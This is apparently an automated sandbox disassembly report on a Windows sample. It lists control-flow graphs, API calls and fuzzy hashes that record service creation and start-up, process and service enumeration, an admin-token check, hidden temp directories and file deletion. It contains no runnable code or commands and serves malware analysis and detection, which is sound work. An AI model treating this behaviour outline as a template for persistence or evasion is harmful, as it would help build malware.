• Sleep.KERNEL32(0000C350), ref: 0014A327
Strings
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: File$Attributes$CreateSleep$CopyMutexService$CommandLineModuleNameTimelstrlen$ChangeCloseConfig2CountEnvironmentExitFirstHandleManagerMessageOpenProcessProcess32SnapshotStartSystemThreadTickToolhelp32VariableVersion__aulldiv
• String ID: zS$%Tmd$C:\Users\user$@L$}en
• API String ID: 2964372999-4230071128
• Opcode ID: afd3d6351805866d66c3ea40e9ff8472c26585f880d6c70bcffcadbdc90c277c
• Instruction ID: e3293a6eb730aeb8f51adb720d26d57176b8f05384c9608a1d62fc2f8fe7eafc
• Opcode Fuzzy Hash: afd3d6351805866d66c3ea40e9ff8472c26585f880d6c70bcffcadbdc90c277c
• Instruction Fuzzy Hash: F22358B1A00301DFD304EF64FC8AA663BB4FB98301B51461AE54697EB5EB708AE5CF51

                                                                                                                                                                                                            Control-flow Graph

APIs
• GetVersionExA.KERNEL32(001CAE70), ref: 001552CC
• CreateDirectoryA.KERNELBASE(0000005C,00000000), ref: 0015549F
• DeleteFileA.KERNELBASE(?), ref: 001556FE
• RemoveDirectoryA.KERNELBASE(00000000), ref: 00155743
• CreateDirectoryA.KERNELBASE(?,00000000), ref: 0015583A
• CreateDirectoryA.KERNELBASE(?,00000000), ref: 001558F3
• CreateDirectoryA.KERNEL32(?,00000000), ref: 00155D71
• CreateDirectoryA.KERNEL32(?,00000000), ref: 00155E82
• GetTempPathA.KERNEL32(00000104,?), ref: 00156029
• CreateDirectoryA.KERNEL32(?,00000000), ref: 001561FF
• GetTempPathA.KERNEL32(00000104,?), ref: 001563DE
• SetFileAttributesA.KERNELBASE(?,00000002), ref: 0015655F
Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Directory$Create$FilePathTemp$AttributesDeleteRemoveVersion
                                                                                                                                                                                                            • String ID: C:\Users\user$C:\whfkpbh\$\$aE'P$r9:
                                                                                                                                                                                                            • API String ID: 1691758827-1166413814
                                                                                                                                                                                                            • Opcode ID: 9bee97c4b9d065477c1dea236d010cf1b3e047ea12314249cbe35ff5e6a5ac55
                                                                                                                                                                                                            • Instruction ID: 1f69f77ae9c2a9888138bc1b0f7bbbd8c8c650dcf00358e654a38ae4449ba2f0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9bee97c4b9d065477c1dea236d010cf1b3e047ea12314249cbe35ff5e6a5ac55
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9FA26BB2A00205DFC704DF24FC96AA53BB5FBA4311B518219E94297EB5FB308AD5CF91

Control-flow Graph
control_flow_graph 717 151d90-151e21 call 175df0 call 163110 722 151e23-151e4b call 16fcc0 717->722 723 151e4c-151e91 CreateFileA 717->723 725 151ed1-151ef0 723->725 726 151e93-151ed0 call 16fcc0 723->726 729 151ef2-151f06 725->729 730 151f0c-151f18 725->730 729->730 731 151f20-151f3e 730->731 733 151f40-151f57 731->733 734 151f59-151f85 731->734 735 151f8b-152063 call 14b620 call 16ff30 WriteFile 733->735 734->735 735->731 740 152069-15209c FindCloseChangeNotification call 16fcc0 735->740 742 1520a1-1520b6 740->742 743 1520c2-1520ca 742->743 744 1520b8 742->744 744->743
APIs
  • Part of subcall function 00163110: WaitForSingleObject.KERNEL32(?,00004E20,?,0014D0F2,00000108), ref: 001631AD
• CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00151E7B
  • Part of subcall function 0016FCC0: ReleaseMutex.KERNEL32(0014D410,?,0014D410,00000108), ref: 0016FCE9
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: CreateFileMutexObjectReleaseSingleWait
• String ID:
• API String ID: 1564016613-0
• Opcode ID: 22f5837e7a40c6c3ee3be3263d5944823e2568d89bb5d090c9fae3ee51ec13ed
• Instruction ID: 4c38f319b3cbb9f489e097b241f6d020158641a4adba2a40a042d69e04128246
• Opcode Fuzzy Hash: 22f5837e7a40c6c3ee3be3263d5944823e2568d89bb5d090c9fae3ee51ec13ed
• Instruction Fuzzy Hash: 7D71F472611204DFC304DF64FC89A6A3BB9FB98315F418259E80697EB4DB709AE5CF81

Control-flow Graph
control_flow_graph 745 14b7a0-14b84c AllocateAndInitializeSid 746 14b861-14b864 745->746 747 14b84e-14b85b 745->747 748 14b8ee-14b90e 746->748 749 14b86a-14b885 CheckTokenMembership 746->749 747->746 750 14b8b4-14b8e8 749->750 751 14b887-14b8ae 749->751 750->748 751->750
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0014B82B
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0014B87D
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: AllocateCheckInitializeMembershipToken
• String ID:
• API String ID: 1663163955-0
• Opcode ID: 1e434bf8c9f31915622607fa10d4e0e72f03e96b0633d08eb81183e79bc3b665
• Instruction ID: 837e2b70412a640a764e1ba25bcebfe3eee488d6fa528ad107c108dc0005887f
• Opcode Fuzzy Hash: 1e434bf8c9f31915622607fa10d4e0e72f03e96b0633d08eb81183e79bc3b665
• Instruction Fuzzy Hash: 07319E75905248EFD704CFA8FDD99BA7BB8FB58304B01819AE40297AB0D7709AD4CB51

Control-flow Graph
control_flow_graph 753 152eb0-152ef9 GetProcessHeap RtlFreeHeap 754 152f30-152f42 753->754 755 152efb-152f07 753->755 758 152f44-152f50 754->758 759 152f56-152f57 754->759 756 152f09-152f19 755->756 757 152f1a-152f2f 755->757 758->759
APIs
• GetProcessHeap.KERNEL32(00000000,00150367,?,00150367,00000000), ref: 00152ED1
• RtlFreeHeap.NTDLL(00000000,?,00150367,00000000), ref: 00152ED8
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
• Opcode ID: 59c7adb539fa9924a3090a7480335d9ad5942488817bfa6c414050d21aedd6ee
• Instruction ID: f30e63a88a2a06e5d576f11d18279de1a55d9d7526c50d3dd3a750582e1e580e
• Opcode Fuzzy Hash: 59c7adb539fa9924a3090a7480335d9ad5942488817bfa6c414050d21aedd6ee
• Instruction Fuzzy Hash: 1301DF31608245CBC318DFA4FE668293BF9F7487207144206F51A8BEB0D330D8E98B15

Control-flow Graph
control_flow_graph 760 14e2c0-14e2e2 761 14e2e4-14e2ec 760->761 762 14e2f2-14e306 GetProcessHeap RtlAllocateHeap 760->762 761->762
APIs
• GetProcessHeap.KERNEL32(00000000,?,?,0017220A,02167FFC,?,?,?,?,0016463C), ref: 0014E2F8
• RtlAllocateHeap.NTDLL(00000000,?,0017220A,02167FFC,?,?,?,?,0016463C), ref: 0014E2FF
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1357844191-0
                                                                                                                                                                                                            • Opcode ID: 8416483f14de977ede38d531b499846a59f5f9a06fabc187798644c3ca993560
                                                                                                                                                                                                            • Instruction ID: baadc4dfb9003755db613a08ab54eecf014547e236bae513d1af665befb331d9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8416483f14de977ede38d531b499846a59f5f9a06fabc187798644c3ca993560
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4E08C76104200AFC7089FA9FC8DA5633B8FB09305F144518FA0DC6AB2CB71E6C18B91

Control-flow Graph
control_flow_graph 763 163cf0-163d33 764 163d35-163d3f 763->764 765 163d41-163d51 763->765 766 163d58-163e30 call 14e430 call 142f90 call 14c580 call 151bb0 CreateFileA 764->766 765->766 775 163e32-163e51 766->775 776 163e53-163e64 766->776 777 163e8a-163e9d 775->777 778 163e66 776->778 779 163e70-163e84 776->779 780 163ec2-163eca 777->780 781 163e9f-163ec0 777->781 778->779 779->777 782 163ed0-163ef7 call 16a7e0 780->782 781->782
APIs
• CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00163E0B
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: e71c06b8d01da2d9b1fa5f9489f71a6a325f1027e8d1682d195e916b76a1f532
• Instruction ID: 5397fee7e2b920637bbddda1b32943dd6f83130f7f52fca8c039dd05e7acc12c
• Opcode Fuzzy Hash: e71c06b8d01da2d9b1fa5f9489f71a6a325f1027e8d1682d195e916b76a1f532
• Instruction Fuzzy Hash: 9E412372A10314DBD314AF20FC82BA13BB1F7A4710F524219E651E6DB5FB709AE1CB91

Control-flow Graph
control_flow_graph 785 1645a9-164637 call 160610 call 16fde0 call 159410 call 171660
APIs
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: bfd0829247956772bdd8471333a8a263eff98c5e69947d433bafc4494db83330
• Instruction ID: 79393dc8eedb8d78068f854f1d3d96820b88099698812382f07167b77e973e2e
• Opcode Fuzzy Hash: bfd0829247956772bdd8471333a8a263eff98c5e69947d433bafc4494db83330
• Instruction Fuzzy Hash: D61104755502068BC714AF74FE894253BF0FB55346325452AE04696DB5EB3086E1CB82

Control-flow Graph
control_flow_graph 795 142800-142832 call 16b150 798 142834 795->798 799 14283e-142842 ExitProcess 795->799 798->799
APIs
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: a6e9de3245b5161842192eea3b4aacc7f914e0cfb3f3aaf760300ecdab966f0a
• Instruction ID: a07e79358fcdb384baf0eb726059429aa817269585d175b227b1520268001373
• Opcode Fuzzy Hash: a6e9de3245b5161842192eea3b4aacc7f914e0cfb3f3aaf760300ecdab966f0a
• Instruction Fuzzy Hash: 6FE08C78000209DBC328DF28E8D687A37B5AB84348394C11EE91A4BE70CB35E4C5CF81

Control-flow Graph
control_flow_graph 800 14a4e0-14a53a lstrlen 801 14a53c-14a548 800->801 802 14a54e-14a564 800->802 801->802
APIs
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: lstrlen
• String ID:
• API String ID: 1659193697-0
• Opcode ID: cb5344382e32d7667f7ad6ad5330b9229be933540e370482a7f9664a0f35c812
• Instruction ID: 1e7763b11c5200db3712b05806d599bd6850ffa4db8f98c1eab530ff360ec9b2
• Opcode Fuzzy Hash: cb5344382e32d7667f7ad6ad5330b9229be933540e370482a7f9664a0f35c812
• Instruction Fuzzy Hash: CAF0CD71600220EFC3025F21FD4D5663BB8FF893613840512E48A86974E77489E2DFD2
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00150537
• CreateServiceA.ADVAPI32(00000000,012532A8,012532A8,000F01FF,00000110,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00150596
• ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 00150615
• StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 0015062A
• CloseServiceHandle.ADVAPI32(00000000), ref: 001506A7
• OpenServiceA.ADVAPI32(00000000,012532A8,00000010), ref: 001506EB
• StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 0015072D
• CloseServiceHandle.ADVAPI32(00000000), ref: 0015073E
• CloseServiceHandle.ADVAPI32(00000000), ref: 001507A8
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: Service$CloseHandle$OpenStart$ChangeConfig2CreateManager
• String ID:
• API String ID: 3525021261-0
• Opcode ID: b8b4f44c17c0bc74e276535aa552d30ab99f5524378763319dc805df7666e641
• Instruction ID: ff063a97b803de87bef5ecaa9953c4dd416f2eb688c892f462b62d6c0cfe8f4a
• Opcode Fuzzy Hash: b8b4f44c17c0bc74e276535aa552d30ab99f5524378763319dc805df7666e641
• Instruction Fuzzy Hash: 4D610131A01314EFD3069F60FC8AB253FB4FB88B11F518605E842AAEB4E77496E5CB45
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,80000000), ref: 0014B0AA
• EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,?,00000024,?,?,00000000), ref: 0014B15A
• GetLastError.KERNEL32 ref: 0014B17A
• EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,?,?,?,00000000), ref: 0014B216
• CloseServiceHandle.ADVAPI32(00000000), ref: 0014B41C
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: EnumServicesStatus$CloseErrorHandleLastManagerOpenService
• String ID:
• API String ID: 1579346331-0
• Opcode ID: 331cf4f33daa062ab1d3b483cf07c2dfc8ec10dad8647be868cd077e006811b0
• Instruction ID: a0f2b06d3ada50d015d75a2ad3a634f7f9534579d36afb4ae1e502eb1c4fd254
• Opcode Fuzzy Hash: 331cf4f33daa062ab1d3b483cf07c2dfc8ec10dad8647be868cd077e006811b0
• Instruction Fuzzy Hash: 42F143B2A05201EFC304DF64FCC9A6A3BB1FB94350B15421AE54697EB5E730DAE4CB81
APIs
• Sleep.KERNEL32(000003E8,00000001), ref: 00169679
• FindFirstFileA.KERNEL32(?,?), ref: 001697B8
• DeleteFileA.KERNEL32(?), ref: 001698A9
• FindNextFileA.KERNEL32(00000000,?), ref: 001698CB
• FindClose.KERNEL32(00000000), ref: 001698E4
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: FileFind$CloseDeleteFirstNextSleep
• String ID:
• API String ID: 1528862845-0
• Opcode ID: 4cedb6e00ea1a001223a52bf3e07025e40a3e96bfd2fc7d6ed234a5740a58e8b
• Instruction ID: 4b7ec12d77ae79b803ec06132f6e0ec141d2224b252409d7c9888dc2bb5e892e
• Opcode Fuzzy Hash: 4cedb6e00ea1a001223a52bf3e07025e40a3e96bfd2fc7d6ed234a5740a58e8b
• Instruction Fuzzy Hash: B3914375901205DFC714DF34FC86AA53BB9FB98704B40861AE94687E70EB348AE1CF91
APIs
• RegisterServiceCtrlHandlerA.ADVAPI32(012532A8,Function_00011860), ref: 00156D72
• SetServiceStatus.ADVAPI32(00000000,001B05F8), ref: 00156DD5
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00156DE9
• SetServiceStatus.ADVAPI32(00000000,001B05F8), ref: 00156E8A
• WaitForSingleObject.KERNEL32(00000000,00001388), ref: 00156EBE
• SetServiceStatus.ADVAPI32(00000000,001B05F8), ref: 00156F2B
• CloseHandle.KERNEL32(00000000), ref: 00156F42
• SetServiceStatus.ADVAPI32(00000000,001B05F8), ref: 00156FAA
Strings
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: Service$Status$CloseCreateCtrlEventHandleHandlerObjectRegisterSingleWait
• String ID: =ZMI
• API String ID: 3399922960-150576250
• Opcode ID: a205d31f3086a2e8d2777c3a776bb635b6cd40c20c3db5d3f5931fbdff293a38
• Instruction ID: 5a1c3a6e04a96dff3e1d90b3f17175ac5cad2d66a39274963f12cd4536c4cc8c
• Opcode Fuzzy Hash: a205d31f3086a2e8d2777c3a776bb635b6cd40c20c3db5d3f5931fbdff293a38
• Instruction Fuzzy Hash: 5E91DBB1901301CFC306DF28FD8A9663FB4FB88715781821AE49586EB4E73885E5CF85
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001544A7
• Process32First.KERNEL32(00000000,?), ref: 001545C2
• CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 001547CE
• Module32First.KERNEL32(00000000,00000224), ref: 00154842
• CloseHandle.KERNEL32(00000000,0000000A), ref: 0015495A
• Process32Next.KERNEL32(?,00000128), ref: 001549AD
• CloseHandle.KERNEL32(00000000), ref: 00154A20
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32$Module32Next
• String ID:
• API String ID: 930127669-0
• Opcode ID: c2d4bd66a5cd0989c8173c72a25ea1fd3aed0103977415bf54743e44424b37d3
• Instruction ID: b7f0551deb72147bec76d60c7128754b5d8e8aecf9e3f1e2f017552fc06afc34
• Opcode Fuzzy Hash: c2d4bd66a5cd0989c8173c72a25ea1fd3aed0103977415bf54743e44424b37d3
• Instruction Fuzzy Hash: 55F16771A00601DFD304CF25FC89A753BB5FB88315B51825AE84A87EB4EB748AE9CF51
APIs
• CreateFileA.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 0014CB20
• ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 0014CB5D
• CloseHandle.KERNEL32(00000000), ref: 0014CBBD
• GetTickCount.KERNEL32 ref: 0014CC1D
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0014CED4
• WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0014CF0E
• CloseHandle.KERNEL32(00000000), ref: 0014CF47
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: File$CloseCreateHandle$CountReadTickWrite
• String ID:
• API String ID: 3478262135-0
